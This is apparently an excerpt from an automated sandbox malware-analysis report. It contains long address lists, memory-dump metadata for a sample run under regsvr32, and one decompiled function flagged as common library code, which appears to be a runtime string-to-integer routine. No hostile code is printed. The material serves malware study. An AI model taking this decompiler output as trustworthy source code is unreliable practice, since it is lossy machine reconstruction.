                                                                                                    0x18002ab36
                                                                                                    0x18002ab3d
                                                                                                    0x18002ab46
                                                                                                    0x18002ab4f
                                                                                                    0x18002ab5a
                                                                                                    0x18002ab61
                                                                                                    0x18002ab6a
                                                                                                    0x18002ab78
                                                                                                    0x18002ab80
                                                                                                    0x18002ab89
                                                                                                    0x18002ab97
                                                                                                    0x18002ab9f
                                                                                                    0x18002aba8
                                                                                                    0x18002abb6
                                                                                                    0x18002abbe
                                                                                                    0x18002abc6
                                                                                                    0x18002abd4
                                                                                                    0x18002abdb
                                                                                                    0x18002abe3
                                                                                                    0x18002abf1
                                                                                                    0x18002abfb
                                                                                                    0x18002ac07
                                                                                                    0x18002ac12
                                                                                                    0x18002ac1f
                                                                                                    0x18002ac2a
                                                                                                    0x18002ac37
                                                                                                    0x18002ac42
                                                                                                    0x18002ac4f
                                                                                                    0x18002ac5a
                                                                                                    0x18002ac67
                                                                                                    0x18002ac72
                                                                                                    0x18002ac7f
                                                                                                    0x18002ac86
                                                                                                    0x18002ac93
                                                                                                    0x18002ac9a
                                                                                                    0x18002aca7
                                                                                                    0x18002acae
                                                                                                    0x18002acbb
                                                                                                    0x18002acc2
                                                                                                    0x18002accf
                                                                                                    0x18002acd6
                                                                                                    0x18002acd8
                                                                                                    0x18002ace2
                                                                                                    0x18002acea
                                                                                                    0x18002acf2
                                                                                                    0x18002acf4
                                                                                                    0x18002acfb
                                                                                                    0x18002acfd
                                                                                                    0x18002ad04
                                                                                                    0x18002ad09
                                                                                                    0x18002ad0b
                                                                                                    0x18002ad15
                                                                                                    0x18002ad24
                                                                                                    0x18002ad29
                                                                                                    0x18002ad2b
                                                                                                    0x18002ad2b
                                                                                                    0x18002ad2f
                                                                                                    0x18002ad31
                                                                                                    0x18002ad34
                                                                                                    0x18002ad3a
                                                                                                    0x18002ad3d
                                                                                                    0x18002ad3d
                                                                                                    0x18002ad41
                                                                                                    0x18002ad44
                                                                                                    0x18002ad4b
                                                                                                    0x18002ad50
                                                                                                    0x18002ad54
                                                                                                    0x18002ad58
                                                                                                    0x18002ad5e
                                                                                                    0x18002ad63
                                                                                                    0x18002ad65
                                                                                                    0x18002ad6a
                                                                                                    0x18002ad70
                                                                                                    0x18002ad75
                                                                                                    0x18002ad89
                                                                                                    0x18002ad92
                                                                                                    0x18002ad9e
                                                                                                    0x18002ada8
                                                                                                    0x18002adaa
                                                                                                    0x18002adae
                                                                                                    0x18002adb1
                                                                                                    0x18002adb6
                                                                                                    0x18002adc1
                                                                                                    0x18002adc5
                                                                                                    0x18002adc5
                                                                                                    0x18002adc9
                                                                                                    0x18002adcc
                                                                                                    0x18002add3
                                                                                                    0x18002add9
                                                                                                    0x18002ade3
                                                                                                    0x18002adf1
                                                                                                    0x18002adf3
                                                                                                    0x18002adf7
                                                                                                    0x18002adfa
                                                                                                    0x18002ae03
                                                                                                    0x18002ae11
                                                                                                    0x18002ae13
                                                                                                    0x18002ae17
                                                                                                    0x18002ae1a
                                                                                                    0x18002ae27
                                                                                                    0x18002ae2d
                                                                                                    0x18002ae2d
                                                                                                    0x18002ae35
                                                                                                    0x18002ae37
                                                                                                    0x18002ae3b
                                                                                                    0x18002ae3e
                                                                                                    0x18002ae4b
                                                                                                    0x18002ae51
                                                                                                    0x18002ae51
                                                                                                    0x18002ae59
                                                                                                    0x18002ae5b
                                                                                                    0x18002ae62
                                                                                                    0x18002ae68
                                                                                                    0x18002ae68
                                                                                                    0x18002ae70
                                                                                                    0x18002ae72
                                                                                                    0x18002ae79
                                                                                                    0x18002ae87
                                                                                                    0x18002ae90
                                                                                                    0x18002ae9b
                                                                                                    0x18002aea4
                                                                                                    0x18002aeaf
                                                                                                    0x18002aeb8
                                                                                                    0x18002aec3
                                                                                                    0x18002aed0
                                                                                                    0x18002aedb
                                                                                                    0x18002aee8
                                                                                                    0x18002aef3
                                                                                                    0x18002af00
                                                                                                    0x18002af07
                                                                                                    0x18002af14
                                                                                                    0x18002af1b
                                                                                                    0x18002af28
                                                                                                    0x18002af2f
                                                                                                    0x18002af3c
                                                                                                    0x18002af43
                                                                                                    0x18002af50
                                                                                                    0x18002af57
                                                                                                    0x18002af59
                                                                                                    0x18002af63
                                                                                                    0x18002af65
                                                                                                    0x18002af69
                                                                                                    0x18002af6c
                                                                                                    0x18002af6e
                                                                                                    0x18002af76
                                                                                                    0x18002af78
                                                                                                    0x18002af7f
                                                                                                    0x18002af81
                                                                                                    0x18002af88
                                                                                                    0x18002af8a
                                                                                                    0x18002af8e
                                                                                                    0x18002af90
                                                                                                    0x18002af93
                                                                                                    0x18002af9b
                                                                                                    0x18002af9d
                                                                                                    0x18002afa1
                                                                                                    0x18002afa9
                                                                                                    0x18002afae
                                                                                                    0x18002afb2
                                                                                                    0x18002afb5
                                                                                                    0x18002afb7
                                                                                                    0x18002afbf
                                                                                                    0x18002afc4
                                                                                                    0x18002afcd
                                                                                                    0x18002afd8
                                                                                                    0x18002afdb
                                                                                                    0x18002afe2
                                                                                                    0x18002afe5
                                                                                                    0x18002afea
                                                                                                    0x18002afee
                                                                                                    0x18002aff1
                                                                                                    0x18002afff
                                                                                                    0x18002b004
                                                                                                    0x18002b006
                                                                                                    0x18002b00b
                                                                                                    0x18002b011
                                                                                                    0x18002b019
                                                                                                    0x18002b01b
                                                                                                    0x18002b026
                                                                                                    0x18002b02c
                                                                                                    0x18002b031
                                                                                                    0x18002b038
                                                                                                    0x18002b049
                                                                                                    0x18002b04b
                                                                                                    0x18002b050
                                                                                                    0x18002b05a
                                                                                                    0x18002b060
                                                                                                    0x18002b066
                                                                                                    0x18002b070
                                                                                                    0x18002b077
                                                                                                    0x18002b07e
                                                                                                    0x18002b085
                                                                                                    0x18002b08a
                                                                                                    0x18002b097
                                                                                                    0x18002b0a1
                                                                                                    0x18002b0a8
                                                                                                    0x18002b0af
                                                                                                    0x18002b0b6
                                                                                                    0x18002b0bb
                                                                                                    0x18002b0c8
                                                                                                    0x18002b0ce
                                                                                                    0x18002b0db
                                                                                                    0x18002b0e2
                                                                                                    0x18002b0e9
                                                                                                    0x18002b0f0
                                                                                                    0x18002b0f5
                                                                                                    0x18002b11b

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: +$-$f$p
                                                                                                    • API String ID: 3215553584-588565063
                                                                                                    • Opcode ID: 56143080864122c63fd452125b820e84937c8f41e5d2344bc7aabfeb31baa12d
                                                                                                    • Instruction ID: 27b04276226fab9998d29f49fc77409fa7f88a9f7e604ff6b2775462832ff1bc
                                                                                                    • Opcode Fuzzy Hash: 56143080864122c63fd452125b820e84937c8f41e5d2344bc7aabfeb31baa12d
                                                                                                    • Instruction Fuzzy Hash: C612C27260825987FBE39A14E1443EAB752F34A7D4FD4C212B6A547AC8CF3CC7898B45
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180029F5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 488COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 75%
                                                                                                    			E00000001180029F5C(signed short* __rax, long long __rbx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
				void* _v40;
				intOrPtr _v56;
				void* _v80;
				void* _v88;
				void* _t101;
				void* _t144;
				signed int _t147;
				void* _t169;
				signed short _t177;
				signed short _t178;
				signed short _t179;
				signed int _t180;
				void* _t225;
				signed int _t229;
				void* _t339;
				signed short* _t358;
				signed short* _t360;
				signed short* _t361;
				signed short* _t362;
				signed short* _t363;
				signed short* _t364;
				signed short* _t366;
				intOrPtr* _t367;
				long long _t372;
				long long* _t374;
				char* _t375;
				signed short* _t376;
				signed short* _t377;
				long long* _t378;
				long long* _t379;
				long long* _t383;
				long long* _t384;
				signed short** _t385;
				long long _t386;
				void* _t397;

				_t386 = __rsi;
				_t372 = __rbx;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r13d = 0;
				sil = r9b;
				r15d = r8d;
				_t385 = __rdx;
				if ( *__rdx != _t397) goto 0x80029faf;
				_t101 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t101);
				_t374 =  *((intOrPtr*)(__rdx + 8));
				if (_t374 == 0) goto 0x80029fa8;
				 *_t374 =  *__rdx;
				goto 0x8002a612;
				if (r8d == 0) goto 0x80029fbd;
				if (__r8 - 2 - 0x22 > 0) goto 0x80029f89;
				_t383 = _t374;
				_t375 =  &_v80;
				E00000001180018238( *__rdx, __rbx, _t375, _t383);
				r14d = r13d;
				_v88 =  *_t385;
				goto 0x80029ff0;
				_t358 =  *_t385;
				_t177 =  *_t358 & 0x0000ffff;
				 *_t385 =  &(_t358[1]);
				if (E00000001180037C8C(_t177 & 0x0000ffff, 8, _t372, _t375) != 0) goto 0x80029fe6;
				bpl = sil != 0;
				if (_t177 != 0x2d) goto 0x8002a016;
				goto 0x8002a01c;
				if (_t177 != 0x2b) goto 0x8002a029;
				_t360 =  *_t385;
				_t178 =  *_t360 & 0x0000ffff;
				_t361 =  &(_t360[1]);
				 *_t385 = _t361;
				_a16 = 0x66a;
				r9d = r9d | 0xffffffff;
				r10d = 0x30;
				r11d = 0xff10;
				_t10 = _t386 - 0x80; // 0x966
				r8d = _t10;
				if ((r15d & 0xffffffef) != 0) goto 0x8002a2e8;
				if (_t178 - r10w < 0) goto 0x8002a23d;
				if (_t178 - 0x3a >= 0) goto 0x8002a084;
				goto 0x8002a238;
				if (_t178 - r11w >= 0) goto 0x8002a223;
				if (_t178 - 0x660 < 0) goto 0x8002a23d;
				if (_t178 - _a16 >= 0) goto 0x8002a0ab;
				goto 0x8002a238;
				if (_t178 - 0x6f0 < 0) goto 0x8002a23d;
				if (_t178 - 0x6fa >= 0) goto 0x8002a0c8;
				goto 0x8002a238;
				if (_t178 - r8w < 0) goto 0x8002a23d;
				if (_t178 - 0x970 >= 0) goto 0x8002a0e7;
				goto 0x8002a238;
				if (_t178 - 0x9e6 < 0) goto 0x8002a23d;
				if (_t178 - 0x9f0 >= 0) goto 0x8002a104;
				goto 0x8002a238;
				if (_t178 - (_t178 & 0x0000ffff) - 0x9e6 < 0) goto 0x8002a23d;
				if (_t178 - 0xa70 >= 0) goto 0x8002a124;
				goto 0x8002a238;
				if (_t178 - 0xae6 < 0) goto 0x8002a23d;
				_t14 = _t375 + 0xa; // 0xaf0
				if (_t178 - _t14 < 0) goto 0x8002a0a1;
				_t15 =  &(_t361[0x3b]); // 0xb66
				if (_t178 - _t15 < 0) goto 0x8002a23d;
				_t16 = _t375 + 0xa; // 0xb70
				if (_t178 - _t16 < 0) goto 0x8002a0a1;
				if (_t178 - 0xc66 < 0) goto 0x8002a23d;
				_t17 = _t375 + 0xa; // 0xc70
				if (_t178 - _t17 < 0) goto 0x8002a0a1;
				_t18 =  &(_t361[0x3b]); // 0xce6
				if (_t178 - _t18 < 0) goto 0x8002a23d;
				_t19 = _t375 + 0xa; // 0xcf0
				if (_t178 - _t19 < 0) goto 0x8002a0a1;
				_t20 =  &(_t361[0x3b]); // 0xd66
				if (_t178 - _t20 < 0) goto 0x8002a23d;
				_t21 = _t375 + 0xa; // 0xd70
				if (_t178 - _t21 < 0) goto 0x8002a0a1;
				if (_t178 - 0xe50 < 0) goto 0x8002a23d;
				_t22 = _t375 + 0xa; // 0xe5a
				if (_t178 - _t22 < 0) goto 0x8002a0a1;
				_t23 =  &(_t361[0x3b]); // 0xed0
				if (_t178 - _t23 < 0) goto 0x8002a23d;
				_t24 = _t375 + 0xa; // 0xeda
				if (_t178 - _t24 < 0) goto 0x8002a0a1;
				_t25 =  &(_t361[0x23]); // 0xf20
				if (_t178 - _t25 < 0) goto 0x8002a23d;
				_t26 = _t375 + 0xa; // 0xf2a
				if (_t178 - _t26 < 0) goto 0x8002a0a1;
				if (_t178 - 0x1040 < 0) goto 0x8002a23d;
				_t27 = _t375 + 0xa; // 0x104a
				if (_t178 - _t27 < 0) goto 0x8002a0a1;
				if (_t178 - 0x17e0 < 0) goto 0x8002a23d;
				_t28 = _t375 + 0xa; // 0x17ea
				if (_t178 - _t28 < 0) goto 0x8002a0a1;
				_t29 =  &(_t361[0x13]); // 0x1810
				if (_t178 - _t29 < 0) goto 0x8002a23d;
				_t30 = _t375 + 0xa; // 0x181a
				if (_t178 - _t30 >= 0) goto 0x8002a23d;
				goto 0x8002a0a1;
				if (_t178 - 0xff1a >= 0) goto 0x8002a235;
				goto 0x8002a238;
				if (((_t178 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0x8002a266;
				_t31 = _t372 - 0x41; // 0xfecf
				if (_t31 - 0x19 <= 0) goto 0x8002a254;
				_t32 = _t372 - 0x61; // 0xfeaf
				if (_t32 - 0x19 <= 0) goto 0x8002a254;
				goto 0x8002a266;
				_t33 = _t372 - 0x61; // 0xfeaf
				if (_t33 - 0x19 > 0) goto 0x8002a263;
				if ((_t178 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0x8002a27a;
				if (r15d != 0) goto 0x8002a2ed;
				_t34 = _t386 + 2; // 0xa
				r15d = _t34;
				goto 0x8002a2ed;
				_t362 =  *_t385;
				r8d = 0xffdf;
				_t229 =  *_t362 & 0x0000ffff;
				_t35 =  &(_t362[1]); // 0xffe1
				_t376 = _t35;
				 *_t385 = _t376;
				_t36 = _t383 - 0x58; // 0x698
				if ((r8w & _t36) == 0) goto 0x8002a2d0;
				r15d =  ==  ? 8 : r15d;
				_t377 =  &(_t376[0xffffffffffffffff]);
				 *_t385 = _t377;
				if (_t229 == 0) goto 0x8002a2ed;
				if ( *_t377 == _t229) goto 0x8002a2ed;
				_t144 = E0000000118002E69C(_t362);
				 *_t362 = 0x16;
				E0000000118002E4F0(_t144);
				r9d = r9d | 0xffffffff;
				r10d = 0x30;
				r11d = 0xff10;
				goto 0x8002a2ed;
				_t179 =  *_t377 & 0x0000ffff;
				r15d =  ==  ? 0x10 : r15d;
				_t39 =  &(_t377[1]); // 0xffe3
				_t363 = _t39;
				 *_t385 = _t363;
				goto 0x8002a2ed;
				_t147 = r9d;
				r13d = 0x660;
				r12d = 0x6f0;
				r8d = _t147 / r15d;
				if (_t179 - r10w < 0) goto 0x8002a4bc;
				if (_t179 - 0x3a >= 0) goto 0x8002a31f;
				goto 0x8002a4b7;
				if (_t179 - r11w >= 0) goto 0x8002a4a2;
				if (_t179 - r13w < 0) goto 0x8002a4bc;
				if (_t179 - 0x66a >= 0) goto 0x8002a348;
				goto 0x8002a4b7;
				if (_t179 - r12w < 0) goto 0x8002a4bc;
				if (_t179 - 0x6fa >= 0) goto 0x8002a367;
				goto 0x8002a4b7;
				if (_t179 - 0x966 < 0) goto 0x8002a4bc;
				_t44 =  &(_t363[5]); // 0x970
				if (_t179 - _t44 >= 0) goto 0x8002a387;
				goto 0x8002a4b7;
				if (_t179 - 0x9e6 < 0) goto 0x8002a4bc;
				_t45 =  &(_t363[5]); // 0x9f0
				if (_t179 - _t45 < 0) goto 0x8002a37d;
				_t46 =  &(_t377[0x3b]); // 0xa66
				if (_t179 - _t46 < 0) goto 0x8002a4bc;
				_t47 =  &(_t363[5]); // 0xa70
				if (_t179 - _t47 < 0) goto 0x8002a37d;
				_t48 =  &(_t377[0x3b]); // 0xae6
				if (_t179 - _t48 < 0) goto 0x8002a4bc;
				_t49 =  &(_t363[5]); // 0xaf0
				if (_t179 - _t49 < 0) goto 0x8002a37d;
				_t50 =  &(_t377[0x3b]); // 0xb66
				if (_t179 - _t50 < 0) goto 0x8002a4bc;
				_t51 =  &(_t363[5]); // 0xb70
				if (_t179 - _t51 < 0) goto 0x8002a37d;
				if (_t179 - 0xc66 < 0) goto 0x8002a4bc;
				_t52 =  &(_t363[5]); // 0xc70
				if (_t179 - _t52 < 0) goto 0x8002a37d;
				_t53 =  &(_t377[0x3b]); // 0xce6
				if (_t179 - _t53 < 0) goto 0x8002a4bc;
				_t54 =  &(_t363[5]); // 0xcf0
				if (_t179 - _t54 < 0) goto 0x8002a37d;
				_t55 =  &(_t377[0x3b]); // 0xd66
				if (_t179 - _t55 < 0) goto 0x8002a4bc;
				_t56 =  &(_t363[5]); // 0xd70
				if (_t179 - _t56 < 0) goto 0x8002a37d;
				if (_t179 - 0xe50 < 0) goto 0x8002a4bc;
				_t57 =  &(_t363[5]); // 0xe5a
				if (_t179 - _t57 < 0) goto 0x8002a37d;
				_t58 =  &(_t377[0x3b]); // 0xed0
				if (_t179 - _t58 < 0) goto 0x8002a4bc;
				_t59 =  &(_t363[5]); // 0xeda
				if (_t179 - _t59 < 0) goto 0x8002a37d;
				_t60 =  &(_t377[0x23]); // 0xf20
				if (_t179 - _t60 < 0) goto 0x8002a4bc;
				_t61 =  &(_t363[5]); // 0xf2a
				if (_t179 - _t61 < 0) goto 0x8002a37d;
				if (_t179 - 0x1040 < 0) goto 0x8002a4bc;
				_t62 =  &(_t363[5]); // 0x104a
				if (_t179 - _t62 < 0) goto 0x8002a37d;
				if (_t179 - 0x17e0 < 0) goto 0x8002a4bc;
				_t63 =  &(_t363[5]); // 0x17ea
				if (_t179 - _t63 < 0) goto 0x8002a37d;
				_t64 =  &(_t377[0x13]); // 0x1810
				if (_t179 - _t64 < 0) goto 0x8002a4bc;
				_t65 =  &(_t363[5]); // 0x181a
				if (_t179 - _t65 >= 0) goto 0x8002a4bc;
				goto 0x8002a37d;
				if (_t179 - 0xff1a >= 0) goto 0x8002a4b4;
				goto 0x8002a4b7;
				if (((_t179 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0x8002a4e5;
				_t66 = _t372 - 0x41; // 0xfecf
				if (_t66 - 0x19 <= 0) goto 0x8002a4d3;
				_t67 = _t372 - 0x61; // 0xfeaf
				if (_t67 - 0x19 <= 0) goto 0x8002a4d3;
				goto 0x8002a4e5;
				_t68 = _t372 - 0x61; // 0xfeaf
				if (_t68 - 0x19 > 0) goto 0x8002a4e2;
				_t225 = (_t179 & 0x0000ffff) - 0x20 + 0xffffffc9;
				if (_t225 == r9d) goto 0x8002a51a;
				if (_t225 - r15d >= 0) goto 0x8002a51a;
				_t339 = r14d - r8d;
				if (_t339 < 0) goto 0x8002a501;
				if (_t339 != 0) goto 0x8002a4fc;
				if (_t225 - _t147 % r15d <= 0) goto 0x8002a501;
				goto 0x8002a508;
				r14d = r14d * r15d;
				r14d = r14d + _t225;
				_t364 =  *_t385;
				_t180 =  *_t364 & 0x0000ffff;
				 *_t385 =  &(_t364[1]);
				goto 0x8002a304;
				 *_t385 =  &(( *_t385)[0xffffffffffffffff]);
				r13d = 0;
				_t366 =  *_t385;
				if (_t180 == 0) goto 0x8002a543;
				if ( *_t366 == _t180) goto 0x8002a543;
				_t169 = E0000000118002E69C(_t366);
				 *_t366 = 0x16;
				E0000000118002E4F0(_t169);
				if ((sil & bpl) != 0) goto 0x8002a567;
				 *_t385 = _v88;
				if (_v56 == r13b) goto 0x80029f99;
				_t367 = _v80;
				 *(_t367 + 0x3a8) =  *(_t367 + 0x3a8) & 0xfffffffd;
				goto 0x80029f99;
				if (E00000001180029BBC(r13d | 0xe) == 0) goto 0x8002a5e4;
				E0000000118002E69C(_t367);
				 *_t367 = 0x22;
				if ((bpl & 0x00000001) != 0) goto 0x8002a58c;
				r14d = r14d | 0xffffffff;
				goto 0x8002a5ed;
				if ((bpl & 0x00000002) == 0) goto 0x8002a5bb;
				if (_v56 == r13b) goto 0x8002a5a5;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t378 = _t385[1];
				if (_t378 == 0) goto 0x8002a5b4;
				 *_t378 =  *_t385;
				goto 0x8002a612;
				if (_v56 == r13b) goto 0x8002a5ce;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t379 = _t385[1];
				if (_t379 == 0) goto 0x8002a5dd;
				 *_t379 =  *_t385;
				goto 0x8002a612;
				if ((bpl & 0x00000002) == 0) goto 0x8002a5ed;
				r14d =  ~r14d;
				if (_v56 == r13b) goto 0x8002a600;
				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
				_t384 = _t385[1];
				if (_t384 == 0) goto 0x8002a60f;
				 *_t384 =  *_t385;
				return r14d;
			}






































                                                                                                    0x180029f5c
                                                                                                    0x180029f5c
                                                                                                    0x180029f5c
                                                                                                    0x180029f61
                                                                                                    0x180029f66
                                                                                                    0x180029f78
                                                                                                    0x180029f7b
                                                                                                    0x180029f7e
                                                                                                    0x180029f81
                                                                                                    0x180029f87
                                                                                                    0x180029f89
                                                                                                    0x180029f8e
                                                                                                    0x180029f94
                                                                                                    0x180029f99
                                                                                                    0x180029fa0
                                                                                                    0x180029fa5
                                                                                                    0x180029faa
                                                                                                    0x180029fb2
                                                                                                    0x180029fbb
                                                                                                    0x180029fbd
                                                                                                    0x180029fc0
                                                                                                    0x180029fc5
                                                                                                    0x180029fcd
                                                                                                    0x180029fd0
                                                                                                    0x180029fe4
                                                                                                    0x180029fe6
                                                                                                    0x180029fe9
                                                                                                    0x180029ff2
                                                                                                    0x180029fff
                                                                                                    0x18002a007
                                                                                                    0x18002a00f
                                                                                                    0x18002a014
                                                                                                    0x18002a01a
                                                                                                    0x18002a01c
                                                                                                    0x18002a01f
                                                                                                    0x18002a022
                                                                                                    0x18002a026
                                                                                                    0x18002a02e
                                                                                                    0x18002a039
                                                                                                    0x18002a042
                                                                                                    0x18002a048
                                                                                                    0x18002a058
                                                                                                    0x18002a058
                                                                                                    0x18002a063
                                                                                                    0x18002a06d
                                                                                                    0x18002a077
                                                                                                    0x18002a07f
                                                                                                    0x18002a088
                                                                                                    0x18002a091
                                                                                                    0x18002a09f
                                                                                                    0x18002a0a6
                                                                                                    0x18002a0ae
                                                                                                    0x18002a0bc
                                                                                                    0x18002a0c3
                                                                                                    0x18002a0cc
                                                                                                    0x18002a0da
                                                                                                    0x18002a0e2
                                                                                                    0x18002a0ea
                                                                                                    0x18002a0f8
                                                                                                    0x18002a0ff
                                                                                                    0x18002a107
                                                                                                    0x18002a115
                                                                                                    0x18002a11f
                                                                                                    0x18002a12c
                                                                                                    0x18002a132
                                                                                                    0x18002a138
                                                                                                    0x18002a13e
                                                                                                    0x18002a144
                                                                                                    0x18002a14a
                                                                                                    0x18002a150
                                                                                                    0x18002a15e
                                                                                                    0x18002a164
                                                                                                    0x18002a16a
                                                                                                    0x18002a170
                                                                                                    0x18002a176
                                                                                                    0x18002a17c
                                                                                                    0x18002a182
                                                                                                    0x18002a188
                                                                                                    0x18002a18e
                                                                                                    0x18002a194
                                                                                                    0x18002a19a
                                                                                                    0x18002a1a8
                                                                                                    0x18002a1ae
                                                                                                    0x18002a1b4
                                                                                                    0x18002a1ba
                                                                                                    0x18002a1c0
                                                                                                    0x18002a1c2
                                                                                                    0x18002a1c8
                                                                                                    0x18002a1ce
                                                                                                    0x18002a1d4
                                                                                                    0x18002a1d6
                                                                                                    0x18002a1dc
                                                                                                    0x18002a1ea
                                                                                                    0x18002a1ec
                                                                                                    0x18002a1f2
                                                                                                    0x18002a200
                                                                                                    0x18002a202
                                                                                                    0x18002a208
                                                                                                    0x18002a20e
                                                                                                    0x18002a214
                                                                                                    0x18002a216
                                                                                                    0x18002a21c
                                                                                                    0x18002a21e
                                                                                                    0x18002a22b
                                                                                                    0x18002a233
                                                                                                    0x18002a23b
                                                                                                    0x18002a23d
                                                                                                    0x18002a244
                                                                                                    0x18002a246
                                                                                                    0x18002a24d
                                                                                                    0x18002a252
                                                                                                    0x18002a254
                                                                                                    0x18002a25e
                                                                                                    0x18002a26d
                                                                                                    0x18002a272
                                                                                                    0x18002a274
                                                                                                    0x18002a274
                                                                                                    0x18002a278
                                                                                                    0x18002a27a
                                                                                                    0x18002a27d
                                                                                                    0x18002a283
                                                                                                    0x18002a286
                                                                                                    0x18002a286
                                                                                                    0x18002a28a
                                                                                                    0x18002a28d
                                                                                                    0x18002a294
                                                                                                    0x18002a299
                                                                                                    0x18002a29d
                                                                                                    0x18002a2a1
                                                                                                    0x18002a2a7
                                                                                                    0x18002a2ac
                                                                                                    0x18002a2ae
                                                                                                    0x18002a2b3
                                                                                                    0x18002a2b9
                                                                                                    0x18002a2be
                                                                                                    0x18002a2c2
                                                                                                    0x18002a2c8
                                                                                                    0x18002a2ce
                                                                                                    0x18002a2d0
                                                                                                    0x18002a2db
                                                                                                    0x18002a2df
                                                                                                    0x18002a2df
                                                                                                    0x18002a2e3
                                                                                                    0x18002a2e6
                                                                                                    0x18002a2ef
                                                                                                    0x18002a2f5
                                                                                                    0x18002a2fb
                                                                                                    0x18002a301
                                                                                                    0x18002a308
                                                                                                    0x18002a312
                                                                                                    0x18002a31a
                                                                                                    0x18002a323
                                                                                                    0x18002a32d
                                                                                                    0x18002a33b
                                                                                                    0x18002a343
                                                                                                    0x18002a34c
                                                                                                    0x18002a35a
                                                                                                    0x18002a362
                                                                                                    0x18002a36f
                                                                                                    0x18002a375
                                                                                                    0x18002a37b
                                                                                                    0x18002a382
                                                                                                    0x18002a38f
                                                                                                    0x18002a395
                                                                                                    0x18002a39b
                                                                                                    0x18002a39d
                                                                                                    0x18002a3a3
                                                                                                    0x18002a3a9
                                                                                                    0x18002a3af
                                                                                                    0x18002a3b1
                                                                                                    0x18002a3b7
                                                                                                    0x18002a3bd
                                                                                                    0x18002a3c3
                                                                                                    0x18002a3c5
                                                                                                    0x18002a3cb
                                                                                                    0x18002a3d1
                                                                                                    0x18002a3d7
                                                                                                    0x18002a3e1
                                                                                                    0x18002a3e7
                                                                                                    0x18002a3ed
                                                                                                    0x18002a3ef
                                                                                                    0x18002a3f5
                                                                                                    0x18002a3fb
                                                                                                    0x18002a401
                                                                                                    0x18002a407
                                                                                                    0x18002a40d
                                                                                                    0x18002a413
                                                                                                    0x18002a419
                                                                                                    0x18002a427
                                                                                                    0x18002a42d
                                                                                                    0x18002a433
                                                                                                    0x18002a439
                                                                                                    0x18002a43f
                                                                                                    0x18002a441
                                                                                                    0x18002a447
                                                                                                    0x18002a44d
                                                                                                    0x18002a453
                                                                                                    0x18002a455
                                                                                                    0x18002a45b
                                                                                                    0x18002a469
                                                                                                    0x18002a46b
                                                                                                    0x18002a471
                                                                                                    0x18002a47f
                                                                                                    0x18002a481
                                                                                                    0x18002a487
                                                                                                    0x18002a48d
                                                                                                    0x18002a493
                                                                                                    0x18002a495
                                                                                                    0x18002a49b
                                                                                                    0x18002a49d
                                                                                                    0x18002a4aa
                                                                                                    0x18002a4b2
                                                                                                    0x18002a4ba
                                                                                                    0x18002a4bc
                                                                                                    0x18002a4c3
                                                                                                    0x18002a4c5
                                                                                                    0x18002a4cc
                                                                                                    0x18002a4d1
                                                                                                    0x18002a4d3
                                                                                                    0x18002a4dd
                                                                                                    0x18002a4e2
                                                                                                    0x18002a4e8
                                                                                                    0x18002a4ed
                                                                                                    0x18002a4f1
                                                                                                    0x18002a4f4
                                                                                                    0x18002a4f6
                                                                                                    0x18002a4fa
                                                                                                    0x18002a4ff
                                                                                                    0x18002a501
                                                                                                    0x18002a505
                                                                                                    0x18002a508
                                                                                                    0x18002a50b
                                                                                                    0x18002a512
                                                                                                    0x18002a515
                                                                                                    0x18002a51a
                                                                                                    0x18002a51e
                                                                                                    0x18002a521
                                                                                                    0x18002a52c
                                                                                                    0x18002a531
                                                                                                    0x18002a533
                                                                                                    0x18002a538
                                                                                                    0x18002a53e
                                                                                                    0x18002a546
                                                                                                    0x18002a548
                                                                                                    0x18002a550
                                                                                                    0x18002a556
                                                                                                    0x18002a55b
                                                                                                    0x18002a562
                                                                                                    0x18002a573
                                                                                                    0x18002a575
                                                                                                    0x18002a57a
                                                                                                    0x18002a584
                                                                                                    0x18002a586
                                                                                                    0x18002a58a
                                                                                                    0x18002a590
                                                                                                    0x18002a597
                                                                                                    0x18002a59e
                                                                                                    0x18002a5a5
                                                                                                    0x18002a5ac
                                                                                                    0x18002a5b1
                                                                                                    0x18002a5b9
                                                                                                    0x18002a5c0
                                                                                                    0x18002a5c7
                                                                                                    0x18002a5ce
                                                                                                    0x18002a5d5
                                                                                                    0x18002a5da
                                                                                                    0x18002a5e2
                                                                                                    0x18002a5e8
                                                                                                    0x18002a5ea
                                                                                                    0x18002a5f2
                                                                                                    0x18002a5f9
                                                                                                    0x18002a600
                                                                                                    0x18002a607
                                                                                                    0x18002a60c
                                                                                                    0x18002a62f

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
